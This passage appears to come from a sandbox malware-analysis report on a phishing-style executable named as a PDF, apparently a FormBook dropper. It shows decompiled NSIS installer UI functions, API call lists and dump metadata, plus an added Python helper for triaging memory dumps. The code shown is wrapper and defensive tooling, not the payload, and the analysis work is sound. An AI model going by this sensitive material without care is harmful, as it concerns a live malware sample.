	while(1) {
		_t4 =  *_t3;
		if(_t4 == 0) {
			break; // end of string: return pointer to the NUL
		}
		if(_t4 != _a8) {
			_t3 = CharNextA(_t3); // executed; advances by one (possibly multi-byte) character
			continue;
		}
		break; // match: return pointer to the matching character
	}
	return _t3;
}

Instruction addresses per decompiled line (column alignment lost in extraction; 0x00000000 marks lines with no code):
0x00405842 0x00405855 0x00405855 0x00405859 0x00000000 0x00000000 0x0040584c 0x0040584f 0x00000000 0x0040584f 0x00000000 0x0040584c 0x0040585b

                                                                                                  APIs
                                                                                                  • CharNextA.USER32(?,0040335A,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00409130), ref: 0040584F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CharNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213498283-0
                                                                                                  • Opcode ID: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                                                                                  • Instruction ID: 93e74edf5e48ccf4ef67a299a55bff5a8c431ca02aebca34623625e4f9fe26b3
                                                                                                  • Opcode Fuzzy Hash: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                                                                                  • Instruction Fuzzy Hash: 27C0803240C64057C610771040344677FF0EB61351F14C86EFCC173160C13468648F26
Uniqueness
• Uniqueness Score: -1.00%
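The dump names under Memory Dump Source encode which region of process memory each dump was taken from, and the protection field is what tells an analyst which dumps hold code and which hold data. The Python below is an added triage helper, not part of the Joe Sandbox report; it assumes the field layout <pid>.<run>.<dump id>.<base VA>.<PAGE_* protection>.<region type>.sdmp inferred from the names above, decodes the protection with the standard Win32 PAGE_* constants, leaves the trailing type field undecoded, and, because the names carry no size, assumes each region extends to the next listed base. With the names on this page it singles out the one executable dump (0x401000, PAGE_EXECUTE_READ) that contains the CharNextA call site 0x0040584F, and maps the stack argument 0x00409130 to the PAGE_READWRITE region at 0x409000.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Assumed layout of a Joe Sandbox dump file name (inferred from the names on the
# page, not taken from vendor documentation):
#   <pid>.<run>.<dump id>.<base VA>.<PAGE_* protection>.<region type>.sdmp
_NAME_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.sdmp$"
)

# Win32 page-protection constants (winnt.h).
_PAGE_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
_EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
_WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80


@dataclass(frozen=True)
class DumpRegion:
    name: str
    pid: int
    run: int
    dump_id: int
    base: int
    protect: int
    mtype: int  # trailing field, left undecoded (assumed to be a MEM_* region type)

    @property
    def executable(self) -> bool:
        return bool(self.protect & _EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & _WRITE_MASK)

    def protect_name(self) -> str:
        base = _PAGE_NAMES.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02x}")
        mods = [n for bit, n in _MODIFIERS.items() if self.protect & bit]
        return "|".join([base] + mods)


def parse_dump_name(name: str) -> DumpRegion:
    name = name.strip()
    m = _NAME_RE.match(name)
    if m is None:
        raise ValueError(f"not a .sdmp name: {name!r}")
    # pid/run are zero-padded to 8 digits like the hex fields and are decoded as hex
    # here; for the single-digit values on this page hex and decimal agree.
    return DumpRegion(name, int(m["pid"], 16), int(m["run"], 16), int(m["dump_id"]),
                      int(m["base"], 16), int(m["protect"], 16), int(m["mtype"], 16))


def find_region(regions: Iterable[DumpRegion], va: int) -> Optional[DumpRegion]:
    """Dump that would contain va: the highest listed base that is <= va.

    Assumption: a region extends to the next listed base (the last one is left
    unbounded). Addresses below the lowest base return None.
    """
    best = None
    for r in sorted(regions, key=lambda r: r.base):
        if r.base > va:
            break
        best = r
    return best


def executable_regions(regions: Iterable[DumpRegion]) -> List[DumpRegion]:
    """The dumps worth disassembling first: anything with an execute bit set."""
    return [r for r in regions if r.executable]


# Constructed input: the Memory Dump Source and Associated names listed on this page.
SAMPLE_DUMPS = [
    "00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp",
    "00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp",
    "00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp",
    "00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp",
    "00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp",
    "00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp",
    "00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp",
    "00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp",
    "00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp",
    "00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp",
    "00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp",
]


def triage(names: Iterable[str] = SAMPLE_DUMPS) -> List[DumpRegion]:
    """Parse every name and return the regions sorted by base address."""
    return sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)


if __name__ == "__main__":
    regions = triage()
    for r in regions:
        flag = "X" if r.executable else ("W" if r.writable else "-")
        print(f"{r.base:#010x} {flag} {r.protect_name():24} {r.name}")
    for va in (0x0040584F, 0x00409130):  # call site and stack argument from the APIs line
        hit = find_region(regions, va)
        print(f"{va:#010x} -> {hit.base:#010x} ({hit.protect_name()})")
```

Feed it the names of any other function's dump list and the same two checks apply: disassemble the regions with an execute bit first, and resolve every absolute address the decompiler left in the code (globals such as 0x7a1f84 in the functions below) to a dump before trusting what it reads there.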

                                                                                                  Non-executed Functions

C-Code - Quality: 96%
// Dialog procedure for an install-progress page. The message numbers, the control IDs
// (0x3ec progress bar, 0x3ee intro text, 0x3f8 details list view, 0x403 "show details"
// button), the 0x405/0x404 thread-start and thread-done notifications and the
// right-click "copy details to clipboard" menu all match the NSIS installer stub's
// InstProc, so this is wrapper code rather than the FormBook payload. It is listed as
// non-executed because the installer UI path never ran in the sandbox.
// Arguments: _a4 = hwnd, _a8 = uMsg, _a12 = wParam, _a16 = lParam.
E0040514E(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
	struct HWND__* _v8;
	long _v12;
	struct tagRECT _v28;
	void* _v36;
	signed int _v40;
	int _v44;
	int _v48;
	signed int _v52;
	int _v56;
	void* _v60;
	void* _v68;
	void* __ebx;
	void* __edi;
	void* __esi;
	long _t87;
	unsigned int _t92;
	unsigned int _t93;
	int _t94;
	int _t95;
	long _t98;
	void* _t101;
	intOrPtr _t123;
	struct HWND__* _t127;
	int _t149;
	int _t150;
	struct HWND__* _t154;
	struct HWND__* _t158;
	struct HMENU__* _t160;
	long _t162;
	void* _t163;
	short* _t164;

	_t154 =  *0x7a1f84; // 0x0 -> cached HWND of the details list view (set on WM_INITDIALOG)
	_t149 = 0;
	_v8 = _t154;
	if(_a8 != 0x110) { // 0x110 = WM_INITDIALOG
		__eflags = _a8 - 0x405;
		if(_a8 == 0x405) { // WM_USER+5: start the install thread, handing it the progress bar
			CloseHandle(CreateThread(0, 0, E004050E2, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
		}
		__eflags = _a8 - 0x111;
		if(_a8 != 0x111) { // 0x111 = WM_COMMAND
			L17:
			__eflags = _a8 - 0x404;
			if(_a8 != 0x404) { // WM_USER+4: install thread finished
				L25:
				__eflags = _a8 - 0x7b;
				if(_a8 != 0x7b) { // 0x7b = WM_CONTEXTMENU
					goto L20;
				}
				__eflags = _a12 - _t154;
				if(_a12 != _t154) { // only handle right-clicks on the list view itself
					goto L20;
				}
				_t87 = SendMessageA(_t154, 0x1004, _t149, _t149); // LVM_GETITEMCOUNT
				__eflags = _t87 - _t149;
				_a8 = _t87; // _a8 now holds the row count
				if(_t87 <= _t149) {
					L37:
					return 0;
				}
				_t160 = CreatePopupMenu();
				AppendMenuA(_t160, _t149, 1, E00405D46(_t149, _t154, _t160, _t149, 0xffffffe1)); // item id 1, caption from the language-string table (id -31)
				_t92 = _a16; // lParam: click position, or -1 when opened from the keyboard
				__eflags = _t92 - 0xffffffff;
				if(_t92 != 0xffffffff) {
					_t150 = _t92;          // x = LOWORD(lParam)
					_t93 = _t92 >> 0x10;
					__eflags = _t93;
					_t94 = _t93;           // y = HIWORD(lParam)
				} else {
					GetWindowRect(_t154,  &_v28); // keyboard: anchor the menu at the list's top-left corner
					_t150 = _v28.left;
					_t94 = _v28.top;
				}
				_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149); // TPM_NONOTIFY|TPM_RETURNCMD: returns the chosen item id
				_t162 = 1; // running byte count, starts at 1 for the trailing NUL
				__eflags = _t95 - 1;
				if(_t95 == 1) { // "copy to clipboard" chosen
					_v60 = _t149;     // LVITEM.mask / iSubItem = 0
					_v48 = 0x79eda0;  // LVITEM.pszText -> static scratch buffer
					_v44 = 0xfff;     // LVITEM.cchTextMax
					_a4 = _a8;        // reuse _a4 as the row index, counting down from the row count
					do { // first pass: sum the row text lengths (+2 each for CRLF) to size the buffer
						_a4 = _a4 - 1;
						_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68); // LVM_GETITEMTEXTA returns the length
						__eflags = _a4 - _t149;
						_t162 = _t162 + _t98 + 2;
					} while (_a4 != _t149);
					OpenClipboard(_t149);
					EmptyClipboard();
					_t101 = GlobalAlloc(0x42, _t162); // GMEM_MOVEABLE|GMEM_ZEROINIT, sized from the first pass
					_a4 = _t101;
					_t163 = GlobalLock(_t101);
					do { // second pass: copy every row straight into the global block, CRLF-terminated
						_v48 = _t163; // LVITEM.pszText now points into the block
						_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
						 *_t164 = 0xa0d; // little-endian "\r\n"
						_t163 = _t164 + 2;
						_t149 = _t149 + 1;
						__eflags = _t149 - _a8;
					} while (_t149 < _a8);
					GlobalUnlock(_a4);
					SetClipboardData(1, _a4); // CF_TEXT; the clipboard now owns the block
					CloseClipboard();
				}
				goto L37;
			}
			__eflags =  *0x7a1f6c - _t149; // 0x0 -> quit/abort flag
			if(__eflags == 0) { // finished normally: show the main window and tell the outer dialog to advance
				ShowWindow( *0x7a27a8, 8); // SW_SHOWNA
				__eflags =  *0x7a282c - _t149;
				if( *0x7a282c == _t149) {
					E00405010( *((intOrPtr*)( *0x79e570 + 0x34)), _t149);
				}
				E00403FB9(1); // notify outer dialog: next page
				goto L25;
			}
			 *0x79e168 = 2; // aborted: installer exit code 2
			E00403FB9(0x78); // notify outer dialog: 'x', quit
			goto L20;
		} else {
			__eflags = _a12 - 0x403;
			if(_a12 != 0x403) { // WM_COMMAND from anything but the "show details" button
				L20:
				return E00404047(_a8, _a12, _a16); // default page handling
			}
			ShowWindow( *0x7a1f70, _t149); // hide the button (SW_HIDE)
			ShowWindow(_t154, 8);          // reveal the details list (SW_SHOWNA)
			E00404015(_t154);              // make it the active control
			goto L17;
		}
	}
	// WM_INITDIALOG: set up the details list view and the progress bar
	_v52 = _v52 | 0xffffffff;
	_v40 = _v40 | 0xffffffff;
	_v60 = 2; // LVCOLUMN.mask = LVCF_WIDTH
	_v56 = 0;
	_v48 = 0;
	_v44 = 0;
	asm("stosd");
	asm("stosd");
	_t123 =  *0x7a27b0;                    // installer header
	_a8 =  *((intOrPtr*)(_t123 + 0x5c));   // list-view background colour (-1 = default)
	_a12 =  *((intOrPtr*)(_t123 + 0x60));  // list-view text colour (-1 = default)
	 *0x7a1f70 = GetDlgItem(_a4, 0x403);   // "show details" button
	 *0x7a1f68 = GetDlgItem(_a4, 0x3ee);   // intro text
	_t127 = GetDlgItem(_a4, 0x3f8);        // details list view
	 *0x7a1f84 = _t127;
	_v8 = _t127;
	E00404015( *0x7a1f70);
	 *0x7a1f74 = E004048B2(4);
	 *0x7a1f8c = 0;
	GetClientRect(_v8,  &_v28);
	_v52 = _v28.right - GetSystemMetrics(0x15); // column width = client width - SM_CXHSCROLL
	SendMessageA(_v8, 0x101b, 0,  &_v60);       // LVM_INSERTCOLUMNA
	SendMessageA(_v8, 0x1036, 0x4000, 0x4000);  // LVM_SETEXTENDEDLISTVIEWSTYLE: LVS_EX_LABELTIP
	if(_a8 >= 0) {
		SendMessageA(_v8, 0x1001, 0, _a8); // LVM_SETBKCOLOR
		SendMessageA(_v8, 0x1026, 0, _a8); // LVM_SETTEXTBKCOLOR
	}
	if(_a12 >= _t149) {
		SendMessageA(_v8, 0x1024, _t149, _a12); // LVM_SETTEXTCOLOR
	}
	_push( *((intOrPtr*)(_a16 + 0x30))); // page-specific text id from the page struct passed in lParam
	_push(0x1b);
	E00403FE0(_a4);
	if(( *0x7a27b8 & 0x00000003) != 0) { // header flags: bit 0 = show details by default, bit 1 = never show details
		ShowWindow( *0x7a1f70, _t149);   // hide the button
		if(( *0x7a27b8 & 0x00000002) != 0) {
			 *0x7a1f70 = _t149;
		} else {
			ShowWindow(_v8, 8);          // show the list view (SW_SHOWNA)
		}
		E00404015( *0x7a1f68);
	}
	_t158 = GetDlgItem(_a4, 0x3ec);                // progress bar
	SendMessageA(_t158, 0x401, _t149, 0x75300000); // PBM_SETRANGE, MAKELPARAM(0, 30000)
	if(( *0x7a27b8 & 0x00000004) != 0) {           // bit 2 = coloured progress bar
		SendMessageA(_t158, 0x409, _t149, _a12);   // PBM_SETBARCOLOR
		SendMessageA(_t158, 0x2001, _t149, _a8);   // PBM_SETBKCOLOR
	}
	goto L37;
}

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 004051AD
                                                                                                  • GetDlgItem.USER32 ref: 004051BC
                                                                                                  • GetClientRect.USER32 ref: 004051F9
                                                                                                  • GetSystemMetrics.USER32 ref: 00405201
                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405222
                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405233
                                                                                                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405246
                                                                                                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405254
                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405267
                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405289
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040529D
                                                                                                  • GetDlgItem.USER32 ref: 004052BE
                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052CE
                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052E7
                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004052F3
                                                                                                  • GetDlgItem.USER32 ref: 004051CB
                                                                                                    • Part of subcall function 00404015: SendMessageA.USER32(00000028,?,00000001,00403E46), ref: 00404023
                                                                                                  • GetDlgItem.USER32 ref: 00405310
                                                                                                  • CreateThread.KERNEL32 ref: 0040531E
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405325
                                                                                                  • ShowWindow.USER32(00000000), ref: 00405349
                                                                                                  • ShowWindow.USER32(00000000,00000008), ref: 0040534E
                                                                                                  • ShowWindow.USER32(00000008), ref: 00405395
                                                                                                  • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004053C7
                                                                                                  • CreatePopupMenu.USER32 ref: 004053D8
                                                                                                  • AppendMenuA.USER32 ref: 004053ED
                                                                                                  • GetWindowRect.USER32 ref: 00405400
                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405424
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545F
                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040546F
                                                                                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405475
                                                                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 0040547E
                                                                                                  • GlobalLock.KERNEL32 ref: 00405488
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040549C
                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004054B4
                                                                                                  • SetClipboardData.USER32 ref: 004054BF
                                                                                                  • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004054C5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                  • String ID: {
                                                                                                  • API String ID: 590372296-366298937
                                                                                                  • Opcode ID: 309033a1c687b2536ac40d3c93993909fdfe10b16a59350bcc5de762b65fd5f7
                                                                                                  • Instruction ID: e51c2fae687d9cc7d74fcbf9b141dffd1b03231730d505384ae97275b1f3778e
                                                                                                  • Opcode Fuzzy Hash: 309033a1c687b2536ac40d3c93993909fdfe10b16a59350bcc5de762b65fd5f7
                                                                                                  • Instruction Fuzzy Hash: 50A14A70800248FFEB119F60DC89AAE7F79FB48355F00812AFA05BA1E1C7795A51DF99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 97%
                                                                                                  			E0040495F(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                                                  				struct HWND__* _v8;
                                                                                                  				struct HWND__* _v12;
                                                                                                  				signed int _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				void* _v24;
                                                                                                  				long _v28;
                                                                                                  				int _v32;
                                                                                                  				signed int _v40;
                                                                                                  				int _v44;
                                                                                                  				signed int* _v56;
                                                                                                  				intOrPtr _v60;
                                                                                                  				signed int _v64;
                                                                                                  				long _v68;
                                                                                                  				void* _v72;
                                                                                                  				intOrPtr _v76;
                                                                                                  				intOrPtr _v80;
                                                                                                  				void* _v84;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				struct HWND__* _t182;
                                                                                                  				int _t196;
                                                                                                  				intOrPtr _t198;
                                                                                                  				long _t202;
                                                                                                  				signed int _t206;
                                                                                                  				signed int _t217;
                                                                                                  				void* _t220;
                                                                                                  				void* _t221;
                                                                                                  				int _t227;
                                                                                                  				signed int _t232;
                                                                                                  				signed int _t233;
                                                                                                  				signed int _t240;
                                                                                                  				struct HBITMAP__* _t250;
                                                                                                  				void* _t252;
                                                                                                  				char* _t268;
                                                                                                  				signed char _t269;
                                                                                                  				long _t274;
                                                                                                  				int _t280;
                                                                                                  				signed int* _t281;
                                                                                                  				int _t282;
                                                                                                  				long _t283;
                                                                                                  				int _t285;
                                                                                                  				long _t286;
                                                                                                  				signed int _t287;
                                                                                                  				long _t288;
                                                                                                  				signed int _t291;
                                                                                                  				signed int _t298;
                                                                                                  				signed int _t300;
                                                                                                  				signed int _t302;
                                                                                                  				int* _t310;
                                                                                                  				void* _t311;
                                                                                                  				int _t315;
                                                                                                  				int _t316;
                                                                                                  				int _t317;
                                                                                                  				signed int _t318;
                                                                                                  				void* _t320;
                                                                                                  
                                                                                                  				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                                  				_t182 = GetDlgItem(_a4, 0x408);
                                                                                                  				_t280 =  *0x7a27c8;
                                                                                                  				_t320 = SendMessageA;
                                                                                                  				_v8 = _t182;
                                                                                                  				_t315 = 0;
                                                                                                  				_v32 = _t280;
                                                                                                  				_v20 =  *0x7a27b0 + 0x94;
                                                                                                  				if(_a8 != 0x110) {
                                                                                                  					L23:
                                                                                                  					if(_a8 != 0x405) {
                                                                                                  						_t289 = _a16;
                                                                                                  					} else {
                                                                                                  						_a12 = _t315;
                                                                                                  						_t289 = 1;
                                                                                                  						_a8 = 0x40f;
                                                                                                  						_a16 = 1;
                                                                                                  					}
                                                                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                  						_v16 = _t289;
                                                                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                                                  							if(( *0x7a27b9 & 0x00000002) != 0) {
                                                                                                  								L41:
                                                                                                  								if(_v16 != _t315) {
                                                                                                  									_t232 = _v16;
                                                                                                  									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                                                  										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                                                  									}
                                                                                                  									_t233 = _v16;
                                                                                                  									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                                                  										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                                                  										} else {
                                                                                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                                                  										}
                                                                                                  									}
                                                                                                  								}
                                                                                                  								goto L48;
                                                                                                  							}
                                                                                                  							if(_a8 == 0x413) {
                                                                                                  								L33:
                                                                                                  								_t289 = 0 | _a8 != 0x00000413;
                                                                                                  								_t240 = E004048DF(_v8, _a8 != 0x413);
                                                                                                  								if(_t240 >= _t315) {
                                                                                                  									_t93 = _t280 + 8; // 0x8
                                                                                                  									_t310 = _t240 * 0x418 + _t93;
                                                                                                  									_t289 =  *_t310;
                                                                                                  									if((_t289 & 0x00000010) == 0) {
                                                                                                  										if((_t289 & 0x00000040) == 0) {
                                                                                                  											_t298 = _t289 ^ 0x00000001;
                                                                                                  										} else {
                                                                                                  											_t300 = _t289 ^ 0x00000080;
                                                                                                  											if(_t300 >= 0) {
                                                                                                  												_t298 = _t300 & 0xfffffffe;
                                                                                                  											} else {
                                                                                                  												_t298 = _t300 | 0x00000001;
                                                                                                  											}
                                                                                                  										}
                                                                                                  										 *_t310 = _t298;
                                                                                                  										E0040117D(_t240);
                                                                                                  										_t289 = 1;
                                                                                                  										_a8 = 0x40f;
                                                                                                  										_a12 = 1;
                                                                                                  										_a16 =  !( *0x7a27b8) >> 0x00000008 & 1;
                                                                                                  									}
                                                                                                  								}
                                                                                                  								goto L41;
                                                                                                  							}
                                                                                                  							_t289 = _a16;
                                                                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                  								goto L41;
                                                                                                  							}
                                                                                                  							goto L33;
                                                                                                  						} else {
                                                                                                  							goto L48;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						L48:
                                                                                                  						if(_a8 != 0x111) {
                                                                                                  							L56:
                                                                                                  							if(_a8 == 0x200) {
                                                                                                  								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                                                  							}
                                                                                                  							if(_a8 == 0x40b) {
                                                                                                  								_t220 =  *0x79ed7c;
                                                                                                  								if(_t220 != _t315) {
                                                                                                  									ImageList_Destroy(_t220);
                                                                                                  								}
                                                                                                  								_t221 =  *0x79ed94;
                                                                                                  								if(_t221 != _t315) {
                                                                                                  									GlobalFree(_t221);
                                                                                                  								}
                                                                                                  								 *0x79ed7c = _t315;
                                                                                                  								 *0x79ed94 = _t315;
                                                                                                  								 *0x7a2800 = _t315;
                                                                                                  							}
                                                                                                  							if(_a8 != 0x40f) {
                                                                                                  								L86:
                                                                                                  								if(_a8 == 0x420 && ( *0x7a27b9 & 0x00000001) != 0) {
                                                                                                  									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                                                  									ShowWindow(_v8, _t316);
                                                                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                                                  								}
                                                                                                  								goto L89;
                                                                                                  							} else {
                                                                                                  								E004011EF(_t289, _t315, _t315);
                                                                                                  								if(_a12 != _t315) {
                                                                                                  									E0040140B(8);
                                                                                                  								}
                                                                                                  								if(_a16 == _t315) {
                                                                                                  									L73:
                                                                                                  									E004011EF(_t289, _t315, _t315);
                                                                                                  									_v32 =  *0x79ed94;
                                                                                                  									_t196 =  *0x7a27c8;
                                                                                                  									_v60 = 0xf030;
                                                                                                  									_v16 = _t315;
                                                                                                  									if( *0x7a27cc <= _t315) {
                                                                                                  										L84:
                                                                                                  										InvalidateRect(_v8, _t315, 1);
                                                                                                  										_t198 =  *0x7a1f7c; // 0x891203
                                                                                                  										if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                                                                                  											E0040489A(0x3ff, 0xfffffffb, E004048B2(5));
                                                                                                  										}
                                                                                                  										goto L86;
                                                                                                  									}
                                                                                                  									_t281 = _t196 + 8;
                                                                                                  									do {
                                                                                                  										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                                                  										if(_t202 != _t315) {
                                                                                                  											_t291 =  *_t281;
                                                                                                  											_v68 = _t202;
                                                                                                  											_v72 = 8;
                                                                                                  											if((_t291 & 0x00000001) != 0) {
                                                                                                  												_v72 = 9;
                                                                                                  												_v56 =  &(_t281[4]);
                                                                                                  												_t281[0] = _t281[0] & 0x000000fe;
                                                                                                  											}
                                                                                                  											if((_t291 & 0x00000040) == 0) {
                                                                                                  												_t206 = (_t291 & 0x00000001) + 1;
                                                                                                  												if((_t291 & 0x00000010) != 0) {
                                                                                                  													_t206 = _t206 + 3;
                                                                                                  												}
                                                                                                  											} else {
                                                                                                  												_t206 = 3;
                                                                                                  											}
                                                                                                  											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                                                  											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                                  											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                                                  										}
                                                                                                  										_v16 = _v16 + 1;
                                                                                                  										_t281 =  &(_t281[0x106]);
                                                                                                  									} while (_v16 <  *0x7a27cc);
                                                                                                  									goto L84;
                                                                                                  								} else {
                                                                                                  									_t282 = E004012E2( *0x79ed94);
                                                                                                  									E00401299(_t282);
                                                                                                  									_t217 = 0;
                                                                                                  									_t289 = 0;
                                                                                                  									if(_t282 <= _t315) {
                                                                                                  										L72:
                                                                                                  										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                                                  										_a16 = _t282;
                                                                                                  										_a8 = 0x420;
                                                                                                  										goto L73;
                                                                                                  									} else {
                                                                                                  										goto L69;
                                                                                                  									}
                                                                                                  									do {
                                                                                                  										L69:
                                                                                                  										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                                                  											_t289 = _t289 + 1;
                                                                                                  										}
                                                                                                  										_t217 = _t217 + 1;
                                                                                                  									} while (_t217 < _t282);
                                                                                                  									goto L72;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                  							goto L89;
                                                                                                  						} else {
                                                                                                  							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                                                  							if(_t227 == 0xffffffff) {
                                                                                                  								goto L89;
                                                                                                  							}
                                                                                                  							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                                                  							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                                                  								_t283 = 0x20;
                                                                                                  							}
                                                                                                  							E00401299(_t283);
